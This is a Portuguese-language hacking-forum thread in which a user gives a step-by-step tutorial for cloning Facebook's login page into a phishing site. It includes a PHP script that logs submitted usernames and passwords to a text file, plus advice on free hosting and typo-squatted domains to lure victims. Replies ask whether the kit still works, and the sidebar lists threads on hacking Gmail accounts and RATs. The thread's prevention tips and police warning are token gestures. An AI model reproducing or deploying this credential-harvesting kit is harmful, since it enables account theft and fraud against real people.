CaveiraTech Fórum
collapse

Tutorial Phishing Scam


Offline MoreFuse

  • C0D3R
  • ****
    • Posts: 286
  • Liked: 151
  • Likes Given: 36
Neste tutorial vou ensinar como se praticar ou prevenir o Phishing Scam.

Pra começo de conversa vou lembrar que se você fizer phishing scam com propósitos criminosos a policia vai atrás de voce.

Primeiramente precisamos entender o que é o phishing scam, que nada mais é do que uma cópia perfeita de uma determinada webpage, com o propósito de roubar informações, tais como endereços, telefones, nome de familiares, documentos, senhas, etc. Imagine a homepage do seu serviço de email, idêntica, porém ao digitar seu login e senha as informações são redirecionadas para um servidor web de um usuário malicioso. Pode ser praticado com qualquer webpage, mesmo as mais seguras como de serviços bancários e compras com cartões de crédito. Esses “clones” são hospedados em algum serviço de hospedagem web, não recomendo nenhum em especial e todos vão ceder suas informações pra policia.

Agora vamos nos aprofundar e criar um phishing scam no nosso localhost, depois se desejar hospedar basta usar algum serviço de hospedagem gratuito.
Para rodar o site no localhost será preciso ter o LAMP/WAMP/MAMP instalado (apache + mysql + php), depois bastara colocar todos arquivos numa pasta no diretório do localhost /var/www e acessa-los digitando localhost ou 127.0.0.1 no navegador.
Primeiro vamos conhecer os arquivos que serão utilizados:

Uma página web (index.html) – É a cópia perfeita de uma página web, quando editarmos os códigos dela devemos mudar o atributo action para seu script php (“action=post.php”). O atributo action consiste numa ação a ser executada em resposta à outra, como clicar em um  botão de login por exemplo, nesse caso a ação é executar o script php.

Script php (post.php) – O pulo do gato do phishing scam, o propósito deste script é pegar os dados e redireciona-los para um arquivo de texto (usuarios.txt) através do método GET

Arquivo de texto (usuarios.txt) – para onde as informações serão direcionadas.

 

Para obter a página web primeiramente devemos acessar a página que desejamos clonar (You are not allowed to view links. Register or Login)

Dê um clique com o botão direito do mouse em um espaço vazio e escolha “view page source” e salve com o nome “index.html”.

abra o arquivo “index.html” e procure pela linha que tem action=”https://www.facebook.com/login.php?login_attempt=1? method=”post” Em seguida troque o conteúdo do action (You are not allowed to view links. Register or Login) por post.php. e troque o method por method=”get”

Ficará action=”post.php” method=”get”

agora crie os arquivos post.php e usernames.txt e deixe tudo numa pasta junto com o index.html

abra o post.php e escreva o script abaixo nele:

 

< ?php
header("Location: You are not allowed to view links. Register or Login");
$handle = fopen("usernames.txt", "a");
foreach($_GET as $variavel => $valor)
{
fwrite($handle, $variavel);
fwrite($handle, “=”);
fwrite($handle, $valor);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 
está pronto, para testar basta colocar a pasta no diretório do servidor local /www e acessar o localhost, depois é só olhar o conteúdo do usernames.txt e as senhas estarão lá, caso deseje usar para descobrir a senha de alguem, só falta hospedar em um site de hospedagem gratuito e fazer a pessoa tentar acessar o site pelo seu endereço, isso pode ser feito de diversas formas mais inteligentes do que simplesmente enviar o link pra pessoa, e geralmente são colocados endereços parecidos (por exemplo faceebuok, feicebook,faceb00ok etc) portanto a melhor maneira de se protejer deste tipo de ataque é verificar se o endereço da página se trata do original. Ainda assim se você por engano for vítima de um phishing scam não haverá problemas se você mudar sua senha imediatamente ou no caso de informações bancárias ligar pro banco imediatamente para cancelar sua conta.

É só isso galera Flw!


Offline User32

  • C0D3R
  • ****
    • Posts: 422
  • Invasao e a Meta do Dia
    • Increve ae
  • Liked: 95
  • Likes Given: 175
cara bem da hora vlw eu uso kali linux e bem mais faciu fazer kkkk 
O verdadeiro hacker não se autodenomina com este título, ele é denominado.


Offline ArthurOliveira

  • Elite
  • ASS4NG3
  • *
    • Posts: 8.275
  • Liked: 1612
  • Likes Given: 793
Já testei este método mais geralmente o navegador detecta que e phishing ou ate mesmo o anti-virus pega.


Offline Full9175

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Código: You are not allowed to view links. Register or Login
boa tarde pessoal esse modelo ainda ta virando ?


Offline Godness_black

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Código: You are not allowed to view links. Register or Login
boa tarde pessoal esse modelo ainda ta virando ?
 Eu também gostaria de saber....


 

* CaveiraTech YouTube

* Facebook

Guilherme Junqueira
04 de Fevereiro de 2019, 18:01 por Guilherme Junqueira
Views: 66833 | Comments: 27

Infelizmente a seção de Grupos de estudos do fórum estava sendo usada por organizações criminosas para recruta...
Guilherme Junqueira
27 de Julho de 2018, 17:30 por Guilherme Junqueira
Views: 43306 | Comments: 64

Pessoal, estou pensando seriamente na possibilidade de criar um novo fórum, só que voltado 100% à programação....
Guilherme Junqueira
26 de Junho de 2018, 20:25 por Guilherme Junqueira
Views: 25557 | Comments: 41

Resolvi fazer uma enquete para ver qual o posicionamento político da maioria aqui no fórum. O Alobus já fez um...
Guilherme Junqueira
20 de Junho de 2018, 12:56 por Guilherme Junqueira
Views: 30162 | Comments: 62

Últimamente o fórum vem sofrendo com muitas pessoas postando pirataria e esse não é o intuito do mesmo. A pira...
Guilherme Junqueira
20 de Fevereiro de 2018, 20:18 por Guilherme Junqueira
Views: 19168 | Comments: 4

Boa noite pessoal, venho apresentar para vocêsYou are not allowed to view links. Register or Login...

* Equipe

Guilherme Junqueira admin Guilherme Junqueira
Administrador
Luiz Viana admin Luiz Viana
Administrador
Alobus gmod Alobus
Moderador Geral

* Tópicos Recentes

Estou tentando clonar uma pagina de login com setoolkit mais não vai por caveiratech2
[Ontem às 00:09]


Começando no kali por zetim
[15 de Maio de 2022, 16:03]


Como hackear a senha do meu gmail?? por p5ych0
[15 de Maio de 2022, 13:34]


Fóruns são superiores a redes sociais - minha opinião. por Alobus
[14 de Maio de 2022, 23:25]


wallet.dat por jonbtc
[13 de Maio de 2022, 16:51]


exploit vsfptd nao cria a conexao por ReddyyZ
[13 de Maio de 2022, 14:14]


CRYPTO50 ━ BEST CRYPTO AIO CHECKER por megamixrecords
[13 de Maio de 2022, 10:47]


melhor jeito de ganhar dinheiro! por EdnaxWhatley
[12 de Maio de 2022, 05:28]


Alguém poderia me ajudar a puxar dados de uma pessoa pelo número de telefone? por AntoniMry0
[11 de Maio de 2022, 12:21]


Não consigo usar rat que não sobem as vitimas por Inside Ω
[11 de Maio de 2022, 09:24]


[TRAIÇÃO] FUI TRAIDO E AGORA. por p5ych0
[09 de Maio de 2022, 10:40]


simulando um CLP com CADe SIMU por tumpascares
[07 de Maio de 2022, 19:21]


Dúvida sobre senhas salvas em navegadores por p5ych0
[07 de Maio de 2022, 11:14]


Porque estudar sobre redes ? por L1z4rd
[06 de Maio de 2022, 16:27]


porque é preciso estudar sobre redes por p5ych0
[06 de Maio de 2022, 10:36]